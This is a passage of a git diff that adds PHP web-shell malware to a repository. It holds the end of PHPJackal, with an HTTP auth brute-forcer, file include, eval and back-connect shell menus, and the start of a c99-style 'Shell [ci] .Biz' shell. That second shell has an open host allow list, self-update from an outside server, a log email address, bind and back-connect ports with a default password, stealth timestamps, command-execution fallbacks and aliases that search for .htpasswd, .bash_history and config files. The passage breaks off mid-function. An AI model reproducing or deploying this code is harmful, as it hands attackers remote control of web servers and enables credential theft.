width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value=anonymous size=35></td><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text value=admin@nasa.gov name=pasS size=35></td></tr><tr><td width='20%' bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Connect></form>$et</center>"; +} +} +function calC(){ +global $t,$et,$hcwd; +$fu=array('-','md5','sha1','crc32','hex','ip2long','decbin','dechex','hexdec','bindec','long2ip','base64_encode','base64_decode','urldecode','urlencode','des','strrev'); +if(!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){ +$to=$_REQUEST['to']; +echo "<center>${t}Output:<br><textarea rows='10' cols='64'>"; +if($to=='hex')for($i=0;$i<strlen($_REQUEST['input']);$i++)echo '%'.strtoupper(dechex(ord($_REQUEST['input']{$i}))); +else echo $to($_REQUEST['input']); +echo "</textarea>$et</center><br>"; +} +echo "<center>${t}Convertor:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Input:</td><td bgcolor='#666666'><textarea rows='10' name='input' cols='64'>";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width='20%' bgcolor='#808080'>Task:</td><td bgcolor='#808080'><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>Crc32</option><option value=strrev>Reverse</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=decbin>Decimal to binary</option><option value=bindec>Binary to decimal</option><option value=dechex>Decimal to hex</option><option value=hexdec>Hex to decimal</option><option value=hex>ASCII to hex</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right><input class=buttons type=submit value=Convert>$hcwd</form>$et</center>"; +} +function authcrackeR(){ +global $errorbox,$et,$t,$hcwd; +if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0; +$data=''; +$method=($_REQUEST['method'])?'POST':'GET'; +if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));} +spliturL($_REQUEST['target'],$host,$page); +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:''; +if($method=='GET')$page.=$data; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +echo '<font color=blue>'; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$so=fsockopen($host,80,$en,$es,5); +if(!$so){echo "$errorbox Can not connect to host$et";break;} +else{ +$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass"); +if($method=='POST')$packet.='Content-Type: application/x-www-form-urlencoded\r\nContent-Length: '.strlen($data); +$packet.="\r\n\r\n"; +$packet.=$data; +fputs($so,$packet); +$res=substr(fgets($so),9,2); +fclose($so); +if($res=='20'){echo "U: $user P: $pass</br>";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");} +} +} +echo 'Done!</font>'; +}else echo "<center><form method='POST' name=form>${t}HTTP Auth cracker:</td><td bgcolor='#333333'><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>"; +} +function openiT($name){ +$ext=strtolower(substr($name,strrpos($name,'.')+1)); +$src=array('php','php3','php4','phps','phtml','phtm','inc'); +if(in_array($ext,$src))highlight_file($name); +else echo '<font color=blue><pre>'.htmlspecialchars(file_get_contents($name)).'</pre></font>'; +} +function opensesS($name){ +$sess=file_get_contents($name); +$var=explode(';',$sess); +echo "<pre>Name\tType\tValue\r\n"; +foreach($var as $v){ +$t=explode('|',$v); +$c=explode(':',$t[1]); +$y=''; +if($c[0]=='i')$y='Integer';elseif($c[0]=='s')$y='String';elseif($c[0]=='b')$y='Boolean';elseif($c[0]=='f')$y='Float';elseif($c[0]=='a')$y='Array';elseif($c[0]=='o')$y='Object';elseif($c[0]=='n')$y='Null'; +echo $t[0]."\t$y\t".$c[1]."\r\n"; +} +echo '</pre>'; +} +function logouT(){ +setcookie('passw','',time()-10000); +header('Location: '.hlinK()); +} +?> +<html> +<head> +<style>body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table {font-size: 15px;} .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style> +<meta http-equiv="Content-Language" content="en-us"> +<script language="JavaScript" type="text/JavaScript"> +function HS(box){ +if(document.getElementById(box).style.display!="none"){ +document.getElementById(box).style.display="none"; +document.getElementById('lk').innerHTML="+"; +} +else{ +document.getElementById(box).style.display=""; +document.getElementById('lk').innerHTML="-"; +} +} +function chmoD($file){ +$ch=prompt("Changing file mode["+$file+"]: ex. 777",""); +if($ch != null)location.href="<?php echo hlinK('seC=fm&workingdiR='.addslashes($cwd).'&chmoD=');?>"+$file+"&modE="+$ch; +} +</script> +<title>PHPJackal [<?php echo $cwd; ?>]</title> +</head><body text="#E2E2E2" bgcolor="#C0C0C0" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC"> +<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%"> +<tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=sqlcl&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=ftpc&workingdiR=$cwd"); ?>">[FTP]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mail]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=tools&workingdiR=$cwd");?>">[Tools]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href='".hlinK("seC=logout")."'>Logout</a>]";?></td></tr></table> +<hr size=1 noshade> +<?php +if(!empty($_REQUEST['seC'])){ +switch($_REQUEST['seC']){ +case 'fm':filemanageR();break; +case 'sc':scanneR();break; +case 'phpinfo':phpinfo();break; +case 'edit':if(!empty($_REQUEST['open']))editoR($_REQUEST['filE']); +if(!empty($_REQUEST['Save'])){ +$filehandle=fopen($_REQUEST['file'],'w'); +fwrite($filehandle,$_REQUEST['edited']); +fclose($filehandle);} +if(!empty($_REQUEST['filE']))editoR($_REQUEST['filE']);else editoR(''); +break; +case 'openit':openiT($_REQUEST['namE']);break; +case 'cr':crackeR();break; +case 'dic':dicmakeR();break; +case 'tools':toolS();break; +case 'hex':hexvieW();break; +case 'img':showimagE($_REQUEST['filE']);break; +case 'inc':if(file_exists($_REQUEST['filE']))include($_REQUEST['filE']);break; +case 'hc':hashcrackeR();break; +case 'fcr':formcrackeR();break; +case 'auth':authcrackeR();break; +case 'ftpc':ftpclienT();break; +case 'eval':phpevaL();break; +case 'snmp':snmpcrackeR();break; +case 'px':pr0xy();break; +case 'webshell':webshelL();break; +case 'mailer':maileR();break; +case 'br':brshelL();break; +case 'asm':safemodE();break; +case 'sqlcl':sqlclienT();break; +case 'calc':calC();break; +case 'sysinfo':sysinfO();break; +case 'checksum':checksuM($_REQUEST['filE']);break; +case 'logout':logouT();break; +default: echo $intro;}}else echo $intro; +echo $footer;?></body></html> \ No newline at end of file diff --git a/php/PHPshell/م€گPHPJackalم€‘/PHPJackal2.jpg b/php/PHPshell/م€گPHPJackalم€‘/PHPJackal2.jpg new file mode 100644 index 0000000..d2ace7a Binary files /dev/null and b/php/PHPshell/م€گPHPJackalم€‘/PHPJackal2.jpg differ diff --git a/php/PHPshell/م€گPHPJackalم€‘/Thumbs.db b/php/PHPshell/م€گPHPJackalم€‘/Thumbs.db new file mode 100644 index 0000000..3757c31 Binary files /dev/null and b/php/PHPshell/م€گPHPJackalم€‘/Thumbs.db differ diff --git a/php/PHPshell/م€گShell [ci] .Biz was hereم€‘/Shell [ci] .Biz was here.jpg b/php/PHPshell/م€گShell [ci] .Biz was hereم€‘/Shell [ci] .Biz was here.jpg new file mode 100644 index 0000000..d4dd2f5 Binary files /dev/null and b/php/PHPshell/م€گShell [ci] .Biz was hereم€‘/Shell [ci] .Biz was here.jpg differ diff --git a/php/PHPshell/م€گShell [ci] .Biz was hereم€‘/Shell [ci] .Biz was here.php b/php/PHPshell/م€گShell [ci] .Biz was hereم€‘/Shell [ci] .Biz was here.php new file mode 100644 index 0000000..e6247f4 --- /dev/null +++ b/php/PHPshell/م€گShell [ci] .Biz was hereم€‘/Shell [ci] .Biz was here.php @@ -0,0 +1,3149 @@ +<?php +//Starting calls +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +@ignore_user_abort(TRUE); +@set_magic_quotes_runtime(0); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +define("starttime",getmicrotime()); +if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "Shell [ci] .Biz was here"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("k1r4_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("k1r4_surl",$surl);} +else {$surl = $_REQUEST["k1r4_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["k1r4_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = " Shell [ci] . Biz ".$shver.": access denied"; + +$gzipencode = TRUE; //Encode with gzip? + +$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) + +$k1r4_updateurl = "http://emp3ror.com/kira//update/"; //Update server +$k1r4_sourcesurl = "http://emp3ror.com/kira/"; //Sources-server + +$filestealth = TRUE; //if TRUE, don't change modify- and access-time + +$donated_html = "<center><b>Owned by Shell [ci] .Biz</b></center>"; +/* If you publish free shell and you wish +add link to your site or any other information, +put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "yarakam@gmail.com"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = TRUE; //If TRUE then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: +0 - files and folders (as default), +1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "<b>" (default) + string {closetag} - close html-tag, e.g. "</b>" (default) + bool {break} - if TRUE and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "k1r4"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} + +$sess_cookie = "k1r4vars"; // Cookie-variable name + +$usefsbuff = TRUE; //Buffer-function +$copy_unset = FALSE; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), + array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), + array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), + array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), + array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), + array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), + array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), + array("<b>Encoder</b>",$surl."act=encoder&d=%d"), + array("<b>Tools</b>",$surl."act=tools&d=%d"), + array("<b>Proc.</b>",$surl."act=processes&d=%d"), + array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"), + array("<b>Sec.</b>",$surl."act=security&d=%d"), + array("<b>SQL</b>",$surl."act=sql&d=%d"), + array("<b>PHP-code</b>",$surl."act=eval&d=%d"), + array("<b>Update</b>",$surl."act=update&d=%d"), + array("<b>Feedback</b>",$surl."act=feedback&d=%d"), + array("<b>Self remove</b>",$surl."act=selfremove"), + array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["k1r4cook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://google.com/releases/ckira\">kira</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"kira ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); k1r4_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("k1r4_buff_prepare")) +{ +function k1r4_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +k1r4_buff_prepare(); +if (!function_exists("k1r4_sess_put")) +{ +function k1r4_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + k1r4_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 